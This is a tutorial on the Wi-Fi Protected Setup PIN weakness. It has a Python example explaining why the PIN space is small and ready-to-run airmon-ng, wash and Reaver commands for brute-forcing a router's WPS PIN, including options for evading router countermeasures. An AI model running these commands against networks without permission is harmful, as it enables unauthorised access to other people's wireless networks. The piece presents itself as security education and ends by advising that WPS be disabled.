Understanding and Exploiting
Wi-Fi Protected Setup (WPS)

Understanding Wi-Fi Protected Setup (WPS)

Wi-Fi Protected Setup (WPS) is a feature present in many Wi-Fi routers and access points. It is designed to give users a convenient way to join devices to a wireless network by pressing a button on the access point and on the client device at the same time. The two devices exchange information and then establish a secure WPA link. While this feature is user-friendly, it has vulnerabilities that can be exploited, especially when WPS is left enabled.

WPS Pin Attack

An often overlooked feature on many Wi-Fi routers and access points is Wi-Fi Protected Setup (WPS). It is a convenience feature that lets the user configure a client device against a wireless network by pressing a button on both the access point and the client device at the same time (the client-side "button" is often implemented in software). The devices trade information and then set up a secure WPA link.

However, a tool named Reaver has been designed to brute-force the WPS PIN exchange (the handshake through which the access point hands out the WPA credentials) remotely, even if the physical button has never been pressed on the access point. While some newer devices have built-in protection against this specific attack, the Reaver WPS exploit remains effective on many networks.
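To see why this brute force is feasible at all, here is an added Python example (not from the original page and not Reaver's code) that applies the PIN checksum rule from the WPS specification and compares the naive 10^8 PIN space with the 11,000 guesses a registrar that confirms each half of the PIN separately actually allows; the per-attempt timing passed to estimated_hours is an assumed figure.

```python
# Added example: why an 8-digit WPS PIN offers far fewer than 10^8 guesses.
# The checksum rule below is the one defined in the WPS specification
# (the same computation hostapd uses); the attempt counts follow from the
# protocol verifying the first four and the last four digits separately.

def wps_pin_checksum(first_seven: int) -> int:
    """Return the checksum digit for the 7-digit body of a WPS PIN."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)   # odd positions (counted from the right) weigh 3
        pin //= 10
        accum += pin % 10         # even positions weigh 1
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is exactly 8 digits and ends in the correct checksum digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])


def naive_search_space() -> int:
    """What an 8-digit PIN would cost if it had to be guessed as a whole."""
    return 10 ** 8


def wps_search_space() -> int:
    """Worst case when each half is confirmed on its own: 10^4 candidates for
    the first half, then 10^3 for the second half (three free digits plus the
    checksum digit, which is derived, not guessed)."""
    return 10 ** 4 + 10 ** 3


def estimated_hours(seconds_per_attempt: float) -> float:
    """Worst-case wall-clock time for the split search at an assumed pace.
    Rate limiting or a lockout on the access point raises this figure; an
    access point with WPS disabled removes the exchange altogether."""
    return wps_search_space() * seconds_per_attempt / 3600


if __name__ == "__main__":
    print("12345670 valid:", is_valid_wps_pin("12345670"))   # checksum digit is 0
    print("naive vs split:", naive_search_space(), wps_search_space())
    print("hours at 1 s/attempt:", round(estimated_hours(1.0), 2))
```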

Finding a Network

After putting the wireless interface into monitor mode with the command:

airmon-ng start wlan0

Reaver includes its own tool for finding vulnerable WPS implementations. To start it, run:

wash -i mon0

Launching Reaver

Once you have identified a network to test, operating Reaver is straightforward. The basic command requires only the local interface, the channel, and the BSSID (the access point's MAC address) to be specified. For example:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

Advanced Options

Some devices implement protections against Reaver-style attacks, and additional options may be needed before the attack makes progress. For example:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15

Attack Duration

Reaver can take a long time to complete its run, even under ideal conditions. However, Reaver saves its progress to a session file automatically, so you can stop the attack at any time and resume it whenever convenient.

Conclusion

While WPS provides convenience, it is essential to be aware of its vulnerabilities. Ethical hackers and cybersecurity professionals should understand these weaknesses so they can secure networks (for instance by disabling WPS where it is not needed) and educate others about the risks.